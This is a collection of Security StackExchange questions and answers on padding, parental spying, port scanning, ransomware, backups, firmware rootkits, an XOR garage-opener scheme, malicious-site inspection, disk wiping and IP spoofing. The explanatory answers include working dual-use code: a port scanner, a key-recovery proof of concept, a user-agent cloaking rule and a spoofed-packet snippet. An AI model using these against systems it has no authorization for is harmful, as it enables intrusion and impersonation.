result. In such a case, when decrypting, not only must the length be a non-zero multiple of the block size, but after decryption, a valid padding must be found. If using the usual "PKCS#7 padding" (when adding k bytes, all added bytes have value exactly k ), the probability that a plaintext of a compatible length actually decrypts to something with a valid padding is about 1/255. 
In that case, "decrypting the plaintext" will produce a decryption error 99.61% of the time, and some random-looking junk the remaining 0.39%. Good encryption system include a MAC , in which case attempting to decrypt something which was not the result of encryption with the same key should result in a duly reported decryption error with overwhelming probability. Summary: when you try to do something that does not make sense, you can obtain various results. | {
"source": [
"https://security.stackexchange.com/questions/120616",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107655/"
]
} |
120,701 | This might sound like a funny question from a twelve-year-old. The less funny part is that I am 21 and currently studying at university (I don't live at University, although I am 15 minutes away. I do not use university network). You might or mightn't believe me, but I have more than enough information to know surefire that both Mom and the university are spying on me from a distance. I know this sounds really paranoid, but let's not discuss it and instead assume that what I say is true. I am wondering in what ways it could be possible, and how I could counter it. Some information about my situation: Mom pays for the internet. Mom lives about 500 miles away. Mom comes every week-end, but cannot physically access my computer (I am always at home, I would know if she did) Mom is incredibly computer-illiterate, but I believe she gets help from people at my uni, as I am sure some of them know more than they should about me. My first thoughts were: My ISP: she might be calling my (her ...) ISP for internet history. I don't know if it is common practice, but it is theoretically plausible. After all, they can monitor my internet traffic, and since mom pays for the internet, she has legal rights to access history. I don't really know if there is a way to counter it. Would using Tor work against it? Wi-Fi and neighbors: she might have gotten the Wi-Fi key and sent it to neighbors, relaying information to her. However, I rarely, if ever, use Wi-Fi. I am directly connected by cable. It is on though, so I don't know if they can still access my computer. If that's the case, can I just disable Wi-Fi and just use cable internet? Is there another way to counter it? (Unlikely, but still): a trojan has been installed on my computer. However, Kaspersky doesn't tell me that anything is wrong. So I can't do anything about it if I don't find it. That probably won't happen because it most likely doesn't exist, and if it does, it is definitely well-hidden. Would Tor solve this problem? Is it all I need? I'd really like to find an alternative solution, since using it for a long time would make me become suspicious even to the eyes of people other than mom. @Matthew Peters: By spying, I mean virtually everything I look up. I don't download much. For example, she might know what youtube videos I watch, or what Wikipedia article I read, basically anything, whether HTTPS or not. | Be careful about assuming too much. You say that you know "surefire" that your university is spying on you, but your only evidence is that your mom is computer illiterate and you're "sure some of them know more than they should" about you ( WARNING - this is a red flag for those of us not in your situation, you do indeed sound extremely paranoid ). If you don't use the university network (which seems unusual when you're on campus with your computer, but I'll take it as given), then your university has no interest in your browsing history, full stop. If someone there in some way helped her get access to your activity, they could go to jail . You wonder if your mom has conscripted your neighbors into her spying scheme (another red flag). Unless your neighbors are the absolute pinnacle of unscrupulous busybodies, they have no interest in your browsing history - they could also go to jail . Very few people could legally help your mother to spy on you, and no one is interested in breaking the law to spy on you . 
The ISP could theoretically provide her some of your browsing history: If they offer some sort of network monitoring service for child safety, then they would provide her whatever they offered to provide her, but it's highly unlikely that such a service actually keeps records, and more likely that it is meant to just block content - if you're not being blocked, such a system wouldn't care what you're doing. If you fall afoul of the DMCA by downloading copyrighted content and the copyright holder both discovers you and sends a notice to your ISP, that notice would be forwarded to your mother as the ISP account holder. ... ISPs are big, they have a lot of customers, and storing browsing history takes up a lot of space for information they don't want to be legally liable for (e.g. if they record browsing history, they can be subpoena'd for it), so it's unlikely that they could provide this information to your mother. That's assumption 1. You then say that she knows what you browse whether you access it over HTTPS or not. This categorically rules out any sort of "from a distance" spying - once your request leaves your browser, no one knows what that request is until it reaches the server it's going to. What this means practically is that if you use HTTPS URLs, someone (theoretically) could know that you went to YouTube, but they couldn't know what you watched. They could know you went to Wikipedia, but not which articles you read. If someone is capable of breaking HTTPS encryption, that person has far more lucrative opportunities than helping mothers spy on their sons. Even if you're mistaken and only HTTP URLs are affected, it still requires someone to basically perform an illegal wiretap to access that information because, as we've determined above, no one who has direct access to your browsing history is interested in keeping it or showing it to anyone. Which leaves us with what is by far the most likely scenario:
There are oodles and oodles of spyware programs out there that have varying degrees of legitimacy - as others have said, many are marketed as tools to give parents just this level of access. Your mother could have found such a tool by typing full sentences into Google easily enough, and they're probably one-click installers just for people like her. Have you confirmed that there is no hardware device like a keylogger installed on your machine? All of these methods get at your history the moment it's created, before it has a chance to be encrypted or go over the wire. They are also the most legally defensible ways for someone to view your browsing history. A big honorable mention goes to the person in the other answer or comment that suggested that if you have a browser profile logged in on a computer that your mother has at her house, then she can view your ongoing internet history as if it were her own. Simplest fix would be to browse in in-cognito mode (or equivalent for your browser if not Chrome), it won't record your history. As for what to do about all of this, I'm going to go the tough love route: Talk to your mother. Tell her to back off, or if she won't tell her she's welcome to view your history but it won't change what you look at. You're a big boy, act like it. Pay for your own ISP. As I've stated I don't believe this avenue is being exploited to see your information, but if she's paying for your service and using that as a justification to spy on you, then it's time to take the next step to separate yourself from reliance on her. Reformat your computer. If there's any concern that something is installed that you can't find, just backup your important documents, erase the thing and start over. Don't put a bandaid on a bullet hole by using ways to hide your traffic from spyware. This one I'm just throwing out there to see if it sticks, if it doesn't describe your scenario then sorry, I'm mostly keying in on the above mentioned red flags: if you're off your meds, get back on them. | {
"source": [
"https://security.stackexchange.com/questions/120701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107795/"
]
} |
120,711 | So, whenever you hear of the mean little hackers who hack websites you hear of "port scanning". I understand what it is (looking for all open ports / services on a remote machine), however that begs the question: Why would an attacker want to know what ports are open? The only reason I see for this is looking for services that may or may not have the default username and password OR a vulnerability or something. But seeing as the odds for this are quite low, why do hackers perform port scans? Is it purely for the reason above? | To run an exploit, an attacker needs a vulnerability. To find a vulnerability, the attacker needs to fingerprint all services which run on the machine (find out which protocol they use, which programs implement them and preferably the versions of those programs). To fingerprint a service, the attacker needs to know that there is one running on a publicly accessible port. To find out which publicly accessible ports run services, the attacker needs to run a port scan. As you see, a port scan is the first reconnaissance step an attacker performs before attacking a system. | {
"source": [
"https://security.stackexchange.com/questions/120711",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92860/"
]
} |
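A minimal sketch of the first reconnaissance step described above - a plain TCP connect scan in Python (target host and port range are placeholders; only scan hosts you are authorized to test). A real tool like nmap adds service and version fingerprinting on top of exactly this kind of result.

import socket

def scan(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 if the TCP handshake succeeded
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    target = "127.0.0.1"  # placeholder target
    found = scan(target, range(1, 1025))
    for port in found:
        try:
            name = socket.getservbyport(port)
        except OSError:
            name = "unknown"
        print("open: %d/tcp (%s)" % (port, name))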
120,748 | You boot up your computer one day and while using it you notice that your drive is unusually busy. You check the System Monitor and notice that an unknown process is using the CPU and both reading and writing a lot to the drive. You immediately do a web search for the process name, and find that it's the name of a ransomware program. A news story also comes up, telling you about how a popular software distribution site was recently compromised and used to distribute this same ransomware. You recently installed a program from that site. Clearly, the ransomware is in the process of doing its dirty work. You have large amounts of important data on the internal drive, and no backup. There is also a substantial amount of non-important data on the drive. This question's title says "mid" operation, but in this example we have not yet investigated how far the ransomware might have actually gotten in its "work." We can look at two situations: You want to preserve as much of your data as possible. However, paying any ransom is out of the question. If possible without risk, you want to know whether the important parts of your data are actually encrypted and overwritten. You also want to try and extract as much of your data as possible without making things worse. You would hate to pay a ransom. But certain parts of the data are so important to you that you would, ultimately, as a last resort, like to still be able to pay for a chance to get them back rather than risk losing any of them. Step by step, what is the ideal thing to do in situation 1 and 2? And why? Note: This is hypothetical. It hasn't actually happened to me. I always keep offsite backups of my important data and I've never been affected by ransomware. | Hibernate the computer If the ransomware is encrypting the files, the key it is using for encryption is somewhere in memory. It would be preferable to get a memory dump, but you are unlikely to have the appropriate hardware for that readily available. Dumping just the right process should also work, but finding out which one may not be trivial (eg. the malicious code may be running inside explorer.exe ), and we need to dump it now . Hibernating the computer is a cheap way to get a memory image¹ Then it could be mounted read-only on a clean computer for a) Assessment of the damage inflicted by the ransomware b) Recovery of unencrypted files² c) Forensic extraction of the in-memory key from the malicious process, other advanced recovery of the files, etc. Note that by read-only I mean that no write is performed at all, for maximum recovery chances. Connecting normally to another Windows system won't provide that. For (c) you would probably need professional support. It may be provided free of charge by your antivirus vendor. Even if you don't manage to recover all your files or you are told it is impossible or too expensive, keep the disk with the encrypted files. What it's impossible today may be cheaper or even trivial in a few months. I recommend that you simply perform the new install on a different disk (you were going to reinstall anyway, the computer was infected, remember?), and keep the infected one -properly labelled- in a drawer. -- As for the second question, where you really want to pay the ransom I'm quite sure the ransomware author could give you back your files even if not all of them were encrypted. 
But if really needed, you could boot from the hibernated disk after cloning it, and let it finish encrypting your (now backed-up) files… ¹ NB: if you didn't have a hibernation file before, creating one may overwrite plaintext versions of now-encrypted files that could otherwise have been recovered (not relevant for most recent ransomware, though). ² Assuming they are not infected… | {
"source": [
"https://security.stackexchange.com/questions/120748",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105562/"
]
} |
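To make step (a) of the answer above (assessing the damage on the read-only mounted image) a bit more concrete, here is a hedged sketch that flags files whose contents look uniformly random, which is typical of encrypted data. The mount point is a placeholder, already-compressed formats (JPEG, ZIP) will also score high, and a real investigation would rely on proper forensic tooling:
import math, os

def entropy(data):
    """Shannon entropy in bits per byte; values close to 8.0 look random/encrypted."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts if c)

def flag_suspicious(mount_point, threshold=7.5, sample_size=64 * 1024):
    for root, _dirs, files in os.walk(mount_point):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as f:
                    sample = f.read(sample_size)
            except OSError:
                continue  # unreadable entry; skip it
            if entropy(sample) > threshold:
                print("possibly encrypted:", path)

flag_suspicious("/mnt/victim_image")  # placeholder: the image mounted read-only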
120,808 | I have been reading a lot here about Ransomware attacks and I am wondering if my strategy for protecting myself is valid or not. I have 10Gb of personal data and 90Gb of photos and videos. I have them in D:\ drive in two separate folders. Personal data folder is synced with Google Drive. Photos are synced with a similar tool (Hubic).
This way every new photo I copy to the D:\ drive is soon sent to cloud storage. If my hard drive dies or is stolen I still have my online copy. But if I suffer a ransomware attack, I suspect this might not help much, since the deleted or encrypted files would most likely be synced to Google Drive as well.
So my question is: Is my method of syncing my data to online storage services (Google Drive, Dropbox, etc.) a good way to protect myself against ransomware? Is there a better backup strategy for ensuring I can recover from ransomware? Note: There is a similar question here, but it focuses on whether the online storage vendor can be trusted or not. In my case I choose to trust them, so, given a successful ransomware attack, would I still have a backup that lets me ignore the ransom demands? | I'm not sure about Google Drive, but Dropbox provides a way to recover previous file versions, a feature that wouldn't be impacted by the ransomware, since it relies on file copies kept on the Dropbox servers. So it'd certainly be a way of protecting your data. However, recovering everything over your internet connection is a relatively slow process. Personally, I would use a NAS device, but wouldn't map it as a network drive (because mapped drives can - and will - be affected if ransomware is activated on your computer). I would use it via FTP/SFTP, probably with a script that syncs the files on a regular basis (a sketch of such a script follows this entry). This way you have the files locally, which makes restoring from an attack less of a problem. It is probably cheaper too. Also, if you prefer a Dropbox-like experience, you might want to try ownCloud on your own device - it also keeps previous versions of files, allowing you to roll back in case of file damage or corruption. Keep in mind that storing multiple old versions of a file takes space on your NAS's disk(s). | {
"source": [
"https://security.stackexchange.com/questions/120808",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107952/"
]
} |
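A minimal sketch of the "sync to the NAS over SFTP with a script" idea from the answer above, assuming the third-party paramiko library; the host, key path and directories are placeholders, and a real script would also compare timestamps and keep old versions:
import os
import paramiko

def sftp_backup(host, user, key_path, local_dir, remote_dir):
    # Authenticate with an SSH key rather than a password
    key = paramiko.RSAKey.from_private_key_file(key_path)
    transport = paramiko.Transport((host, 22))
    transport.connect(username=user, pkey=key)
    sftp = paramiko.SFTPClient.from_transport(transport)
    try:
        for name in os.listdir(local_dir):
            local_path = os.path.join(local_dir, name)
            if os.path.isfile(local_path):
                # Upload each file; a production script would skip unchanged files
                sftp.put(local_path, remote_dir + "/" + name)
    finally:
        sftp.close()
        transport.close()

sftp_backup("nas.local", "backup", "/home/me/.ssh/id_rsa", "D:/Photos", "/backups/photos")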
120,861 | I recently visited a website which used to have an HTTPS connection. Now it has just a plain HTTP connection, and the authentication method has changed from user+password to "authenticate with Google account". I contacted them and asked them why they dropped the HTTPS, and they told me "because now the authentication is secure with Google, so it is not necessary anymore". Well, I am not an expert in security, but before replying to them, I would like to know: what could go wrong? So, with my little knowledge, I would say (correct me if I am wrong): Privacy loss in the communications between client and server (the attacker can read any information exchanged, and that includes personal information that the client may be posting to the server). An attacker could modify the client's requests, maybe with malicious intentions. An attacker could read the cookie and use it to get access to the service as if they were the client that originally authenticated using Google's services. Am I right? What else could go wrong? | You are right, the regression to HTTP is pointless. Note that all your points apply to one particular kind of attack, where the adversary is able to access the data transport between client and server. That could be the owner of a WiFi hotspot or your ISP acting as a man-in-the-middle , who sits in between you and the server. This can be hard to accomplish for a remote attacker, but is particularly easy on a public WiFi. What HTTPS adds to HTTP is secure data transport . The web application itself can be completely fine - if you are communicating over an unencrypted channel, the attacker will be able to read, modify and inject arbitrary data into your requests and the server responses. With a captured session cookie, it will also be possible to impersonate you for as long as the cookie is valid. What the attacker cannot do is take over your Google account or reauthenticate with Google at a later point. This is because the authentication with Google always happens over SSL and the granted token expires after a given time. So the situation is somewhat better than capturing your credentials straight away. However, as you said, an attacker would still be able to take over the session and perform any action on your behalf. | {
"source": [
"https://security.stackexchange.com/questions/120861",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55814/"
]
} |
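A quick way to verify the kind of regression described above is to check whether plain HTTP still redirects to HTTPS and whether an HSTS header is sent; a sketch using the third-party requests library, with a placeholder domain:
import requests

def check_https(domain):
    r = requests.get("http://" + domain, allow_redirects=True, timeout=10)
    redirected = r.url.startswith("https://")
    hsts = r.headers.get("Strict-Transport-Security")
    print("final URL:", r.url)
    print("redirects plain HTTP to HTTPS:", redirected)
    print("HSTS header:", hsts if hsts else "not set")

check_https("example.com")  # placeholder domain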
121,100 | Are there viruses that have managed to hide themselves somewhere other than on the hard drive? Like CPU cache or on the motherboard? Is it even possible? Say I get a virus, so I get rid of the HDD and install a new one. Could the virus still be on my PC? | Plenty of places: BIOS / UEFI - BlackHat presentation (PDF) System Management Mode (SMM) or the Intel Management Engine (IME) - Phrack article . GPUs - Proof of concept rootkit on GitHub . Network cards - Recon 2011 presentation (PDF) A Quest To The Core (PDF) - a good presentation covering everything from BIOS to SMM to microcode. Modern hardware has a wide range of persistent data stores, usually used for firmware. It's far too expensive to ship a complex device like a GPU or network card and put the firmware on a mask ROM where it can't be updated, then have a fault cause mass recalls. As such you need two things: a writeable location for that firmware, and a way to put the new firmware in place. This means the operating system software must be able to write to where the firmware is stored in the hardware (usually EEPROMs). A good example of this is the state of modern BIOS/UEFI update utilities. You can take a UEFI image and an executable running on your OS (e.g. Windows), click a button, and your UEFI updates. Simple! If you reverse engineer how these work (which I have done a few times) it's mostly a case of a kernel-mode driver being loaded which takes page data from the given UEFI image and talks directly to the UEFI chip using the out instruction, sending the correct commands to unlock the flash and start the update process. There are some protections, of course. Most BIOS / UEFI images won't load unless they're signed by the vendor. Of course, an advanced enough attacker might just steal the signing key from the vendor, but that's going into conspiracy theories and godlike threat actors, which just aren't realistic to fight in almost any scenario. Management engines like IME are meant to have certain protections which prevent their memory sections from being accessed even by ring0 code, but research has shown that there are many mistakes out there, and lots of weaknesses. So, everything is screwed, right? Well, yes and no. It's possible to put rootkits in hardware, but it's also incredibly difficult. Each individual computer has such a variance in hardware and firmware versions that it's impossible to build a generic rootkit for most things. You can't just get a generic Asus BIOS and flash it to any board; you'll kill it. You'd need to create a rootkit for each separate board type, sometimes down to the correct revision range. It's also an area of security that involves a huge amount of cross-domain knowledge, way down deep to the hardware and low-level operational aspects of modern computing platforms, alongside strong security and cryptographic knowledge, so not many people are capable. Are you likely to be targeted? No. Are you likely to get infected with a BIOS/UEFI/SMM/GPU/NIC-resident rootkit? No. The complexities and variances involved are just too great for the average user to ever realistically have to worry about it. Even from an economic perspective, these things take an inordinate amount of skill and effort and money to build, so burning them on consumer malware is idiotic. These kinds of threats are so targeted that they only ever really belong in the nation-state threat model. | {
"source": [
"https://security.stackexchange.com/questions/121100",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108303/"
]
} |
121,112 | Every time I visit a clinic, office or train station I notice how easy it is to figure out the PIN required to unlock the staff-only door just by watching an employee enter the restricted area. I usually don't have to do anything, not even try to avoid getting caught; it's simply easy to learn the PIN from a decent distance because the keypad design is typical and everybody knows the location of the digits and which one corresponds to which square. However, I went to the bank and the keypad there had a different design which made it difficult to guess the PIN. What is the downside of this design? Why don't we see it used in safes? | There is a Security User Experience (SUX) downside, which you might consider to be minor. As someone who is more kinesthetically inclined, I don't memorize things like phone numbers or PINs: I memorize patterns. If I were forced to use this keypad, I would have to use a compensating method to remember the actual digits (like writing it down). While not everyone is strongly kinesthetic, it is a factor in how people learn, which means that others might need to write down the passcode, too. This, of course, defeats the purpose of having a dynamic keypad. As I say, it might be a minor point, but it is a downside that impacts security. | {
"source": [
"https://security.stackexchange.com/questions/121112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31356/"
]
} |
121,116 | I'm building an Arduino-based radio garage door opener, and in order to protect it from replay attacks I've come up with this algorithm: the sender initiates communication; the receiver sends a random 32-bit number XORed with a secret key; the sender reverses the XOR operation using the same secret key, resolves the challenge (ex: challenge ^ 2 - 5), XORs the result and sends it to the receiver together with the command (gate up or gate down); the receiver compares the response with its own calculation of the challenge and executes the command if they match. I'm curious, do the steps described above ensure that the response is impossible to guess for an attacker? | No. Let's write it up: C is the challenge message, R is the response message, K is the secret key. C = q ⊕ K where q is a random number. R = ((C ⊕ K)² - 5) ⊕ K, or if we skip the decryption step: R = (q² - 5) ⊕ K. The attacker can see both C and R. If the attacker then XORs the two values: C ⊕ R = (q² - 5) ⊕ K ⊕ q ⊕ K. Since we're XORing with K twice, we can just drop those operations out. This gives the attacker the following: C ⊕ R = (q² - 5) ⊕ q. There are only a few values for q for any given value of C ⊕ R in the 32-bit space. In fact, it's an easy enough operation to just brute force: try all q values until you find the ones that match. This gives you some possible values of q, the random number. Since C = q ⊕ K, just compute C ⊕ q for each candidate q to get a small number of possible K values. Repeat this process a second time and see which candidate K value came up in both runs: this gives you K. I even wrote a PoC!
// our key!
int k = 0xBAD1DEA;
void Main()
{
// output the key just so we can see it in the output
Console.WriteLine("Key is: 0x{0:X8}", k);
int challenge = GenerateChallenge();
int response = GenerateResponse(challenge);
Console.WriteLine();
Console.WriteLine("Cracking the challenge and response...");
// this is the attacker: they know only the challenge and respoonse!
Crack(challenge, response);
}
int GenerateChallenge()
{
Random rng = new Random();
// I'm keeping the random number small-ish to avoid the c^2 operation from overflowing
// this is just a limitation of the fact that .NET has sane integer types that don't wrap on multiplication overflows
int q = rng.Next(0, 10000000);
Console.WriteLine("I picked q={0}", q);
int challenge = k ^ q;
return challenge;
}
int GenerateResponse(int c)
{
c ^= k;
return ((c * c) - 5) ^ k;
}
void Crack(int c, int r)
{
int c_r = c ^ r;
// try all possible 'q' values.
for (int q = 1; q < int.MaxValue; q++)
{
if ((((q * q) - 5) ^ q) == c_r)
{
// got a match, output it
Console.WriteLine("q candidate: {0}", q);
Console.WriteLine("k candidate: 0x{0:X8}", q ^ c);
}
}
} Sample output: Key is: 0x0BAD1DEA
I picked q=2847555
Cracking the challenge and response...
q candidate: 2847555
k candidate: 0x0BAD1DEA The "cracking" process took less than a second on my system. EDIT: Since this apparently wasn't clear: you're not bruteforcing anything against the real system. This approach doesn't involve you sending any data to the receiver at all. You simply sit there with a software defined radio (SDR) and capture the signals produced when the owner opens their garage door. You then extract the challenge and response values from those signals - these are C and R . Given C and R you can use the above process to compute a few possible q values for that particular challenge/response pair. In some cases you'll get only one, in some cases you might get 2 or 3. Compute q ⊕ C for each candidate q to get a list of candidate K values. If you get more than one, wait for them to open their garage again and capture another C and R pair, re-run the process, and see which candidate K values match the first time around - this will give you the real K value. Once you've got that, you've got everything you need to impersonate the real opener device. You can reply correctly every time since you know the value of K . | {
"source": [
"https://security.stackexchange.com/questions/121116",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108317/"
]
} |
121,481 | It is a known fact that exposing exception information to the end user poses security risks, since an adversary can use that to figure out how things work internally and attack it. But what about a web service, where that information might be relevant to the developers that consume the API? On one hand, exposing the full stack trace, and even the message, is risky since it might contain internal details such as database information; on the other hand, if something goes wrong and the server just says 500 "sorry", then developers would be frustrated. I guess the proper way is to handle all exceptions you know of in a secure manner, i.e. catch business/validation exceptions and return them with special error codes and messages (no stack trace), and for all unknown ones still return a generic 500 "sorry". But I would like to hear what the common ways of doing it are and which approach should be taken from a security point of view. | The API should not expose any internal information, i.e. stack traces or similar. As you rightly noticed, they might leak information which could be used to attack the implementation. Moreover, they are usually only relevant for the developer of the API and not the user of the API. These users expect proper error messages anyway and not some strange message where they would need to ask the API developer first what it means and the developer would need to look at the source code. So this might be less of a security issue and more of a usability problem of the API if you just throw the stack trace at the user instead of something meaningful for the user (a sketch of this pattern follows this entry). | {
"source": [
"https://security.stackexchange.com/questions/121481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36623/"
]
} |
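A sketch of the pattern referenced above - full details go to the server log under an incident id, the API consumer only gets a generic message - using Flask as an example framework; the error codes and the ValidationError class are illustrative, not from any particular project:
import logging, uuid
from flask import Flask, jsonify

app = Flask(__name__)
log = logging.getLogger("api")

class ValidationError(Exception):
    """Business/validation errors whose message is safe to show to the client."""

@app.errorhandler(ValidationError)
def handle_validation(err):
    # Known, expected failures get a specific code and a sanitized message
    return jsonify(error="validation_failed", message=str(err)), 400

@app.errorhandler(Exception)
def handle_unexpected(err):
    incident = str(uuid.uuid4())
    # The full stack trace goes to the server log only, keyed by an incident id
    log.error("unhandled error, incident %s", incident, exc_info=err)
    return jsonify(error="internal_error", incident=incident), 500
The client can quote the incident id in a support request, so developers can still find the full trace without it ever leaving the server.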
121,610 | Sometimes I'm interested in what's behind a malicious website. How do I stay on the safe side if I decide to inspect? I'm searching for methods that are quicker and more simple than running the website on a virtual machine. Should I use cURL and view the HTML source in a file viewer? Should I simply view the source in the browser using view-source:http://malicious-website/ ? Are those safe? | Why not just send the URL to Virustotal? Accessing a malicious website can be tricky. Using curl, wget, links -dump can be tricky depending on how the malicious content is served up. For example: <IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww\-perl|curl|wget).* [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule> Using mod_rewrite, I can feed you non-malicious pages. I can send you elsewhere, do whatever I'd like. Further, I can change payloads, e.g. instead of feeding you malicious content, I can just change it to a non-malicious "Hello World" JavaScript. This may trick you into thinking my malicious website is harmless. Normally when I have to visit a malicious website, I have a virtualized sandbox which runs Burp Suite for interception, a Squid proxy server, and a few other tools (NoScript, Ghostery, etc.). What is the ultimate purpose of visiting, outside of curiosity? | {
"source": [
"https://security.stackexchange.com/questions/121610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46520/"
]
} |
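The cloaking trick above is easy to observe from the analyst's side: fetch the same URL with different User-Agent strings and compare what comes back. A hedged sketch with a placeholder URL, using the third-party requests library - and, as the answer says, only ever from an isolated, disposable machine:
import hashlib
import requests

URL = "http://suspicious.example"  # placeholder; never run this from a machine you care about

browser_ua = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 Safari/537.36")

for ua in ("curl/7.47.0", browser_ua):
    body = requests.get(URL, headers={"User-Agent": ua}, timeout=10).content
    print(ua.split()[0], len(body), hashlib.sha256(body).hexdigest()[:16])
# Different sizes or hashes for different User-Agents suggest the server is cloaking.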
121,673 | If the goal is to make data no longer retrievable, how secure is it to format the disk? I assumed formatting the disk overwrites free space (thus making it a safe bet no one's going to be able to retrieve the data) but according to webopedia this is not the case. How much more secure is it to delete files with an erasure utility (using something like Schneier's method )than formatting the drive? How does formatting the drive not erase all data: formatting involves recreating the file system so this seems to imply the data is not retrievable. I generally do not choose the "quick format" option. | Quick-formatting a hard disk simply erases the filesystem's structures and tables and writes new ones in place, giving the illusion of a brand new disk. Old data is simply overwritten as and when needed, but it still remains on the disk. File carving utilities can go through the disk data and recover fragments of files, then stitch them back together without needing the original filesystem entries. This is commonly offered in commercial "undelete" applications, but more comprehensive methods are available in forensics packages. Wiping a disk with a single pass of random data (or zeroes, or whatever really) is sufficient to fully remove all traces of the data from the overwritten sectors. Multiple passes are pointless on modern disks, even against the perceived threat of hardware-level recovery attacks. I refer you to this question for details, but the short answer is that old techniques like magnetic force microscopy (MFM) were never really effective at recovering overwritten data in the first place on low-density devices, and newer magnetic disks have such high densities that it's physically impossible. Multi-pass overwrites are there to help people validate their need for über-security, or sell magic disk wiping software, despite it being pointless and detrimental to disk longevity. The only exception is flash (e.g. USB flash drives and SSD), which have additional wear-leveling sectors to increase the lifespan of the device. The physical sectors are exposed as a logical map to the system, which makes it impossible to directly overwrite all of the data. Even if you overwrite all the logical sectors, old data might remain in the wear-leveling sectors. In order to combat this, some flash device specifications include an encryption requirement to increase the difficulty of recovery (because it is no longer possible to directly read data from the memory chips using hardware probes). In SSDs, encryption can be used to speed up the ATA Secure Erase feature. All sectors on the disk are encrypted using a key stored in hardware, and this key can be discarded and a new one generated when a Secure Erase command is sent to the device, thus rendering all data on the disk (including slack / wear-leveling areas) unreadable. Secure Erase is also possible without encryption, but then the drive must actually delete all memory cells, which may take a while. | {
"source": [
"https://security.stackexchange.com/questions/121673",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
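For a single file on a magnetic disk, the "one pass of random data" point above looks roughly like the sketch below (the path is a placeholder). As the answer notes, this is not reliable on SSDs/flash because of wear levelling, and copy-on-write or journaling filesystems may also keep old blocks around; whole-device wiping or ATA Secure Erase is the right tool in those cases:
import os

def overwrite_and_delete(path, chunk=1024 * 1024):
    """One pass of random data over the file's logical extent, then unlink it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        written = 0
        while written < size:
            block = os.urandom(min(chunk, size - written))
            f.write(block)
            written += len(block)
        f.flush()
        os.fsync(f.fileno())
    os.remove(path)

overwrite_and_delete("/tmp/secret.txt")  # placeholder path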
121,687 | Someone recently told me that the NSA could impersonate pretty much anyone they want by using IP address spoofing on the Internet.
But how would that work and to what extent is it true anyway? Could any ISP in the world just spoof any IP address they wanted or is there some kind of protection against that? | IP spoofing is NOT IP hijacking, which is causing confusion for anyone reading this. Let's have an ASCII look at what it does, and how it happens: You (1.2.3.4) --> connect to your bank --> Bank (2.2.2.2) In spoofing, I can pretend to be anyone I want, if I am on your network: Me (1.2.3.4) to you --> I am 2.2.2.2 --> You
Me (1.2.3.4) to you --> I am Google.com --> You This is a moot point because if you respond, I will NEVER see the response, I am not 2.2.2.2 nor Google. This is called blind spoofing . For impersonation , I want to pretend to be your bank without you knowing this, because I want to steal your money. Therefore I need to see your responses and your bank's response. Now I have to perform multiple impersonations. I have to pretend to you, that I am your bank, and I have to pretend to your bank, that I am you: Me (1.2.3.5) --> to your ROUTING handler (be it a router or your routing table)
Me (1.2.3.5) --> I am 2.2.2.2 --> You
Me (1.2.3.5) --> I am 1.2.3.4 --> Your bank For this to occur I MUST be in your infrastructure. Think of this as a proxy server. Using a proxy server the connection is the same: Me (1.2.3.5) --> proxy server (1.2.3.10) --> Bank (2.2.2.2)
Bank responds --> proxy server --> Me Traffic needs to flow to and from. In an IP Hijacking scenario, data is relayed, hence there is no spoofing (I can proxy to see everything) BGP Hijacking enables watching the wire. Someone ON the network that is performing the hijacking can then perform the spoofing. Now in the case of an ISP/NSP/NAP, a government may take this approach: You (1.2.3.4) --> ISP (1.2.3.1 default route) --> Bank (2.2.2.2) # Normal connection In the above, this would be the non-tampered session that would occur. In say an NSA tapped network this is what would occur: You (1.2.3.4) --> ISP (1.2.3.1) --> internal ISP proxy <-- NSA (1.2.4.1) --> Bank (2.2.2.2) From your perspective, you are connecting to your ISP, then to your bank. You will never (and can never) see the proxying occurring. This is the kind spoofing/masquerating/impersonation done with systems created by companies like Narus that used a tap at AT&T to tap main connections. There is little to be done on a scale of eavesdropping like this, as government agencies have the capabilities of using SSL certificates, and other means to prevent you from knowing what is going on. VPN tunneling won't prevent it, as you are at the mercy of your provider, and a warrant is a warrant. There is no need for "BGP Hijacking", BCP filtering to even enter this discussion as BCP filtering will not counter the above proxy example. BCP filtering covers spoofing, not proxying, nor hijacking. If an attacker manages to manipulate the routing table on say your operating system, BCP is a moot point. | {
"source": [
"https://security.stackexchange.com/questions/121687",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/50144/"
]
} |
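The blind-spoofing case above can be demonstrated on a lab network you own with the third-party scapy library (root privileges required; addresses are placeholders): the forged packet leaves your machine, but any reply is routed to the spoofed source address, never back to you.
from scapy.all import IP, ICMP, send

# Craft an ICMP echo request that claims to come from 1.2.3.4
spoofed = IP(src="1.2.3.4", dst="2.2.2.2") / ICMP()
send(spoofed)
# Any reply goes to 1.2.3.4, so the real sender never sees it -
# which is why blind spoofing alone cannot be used to impersonate a bank.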
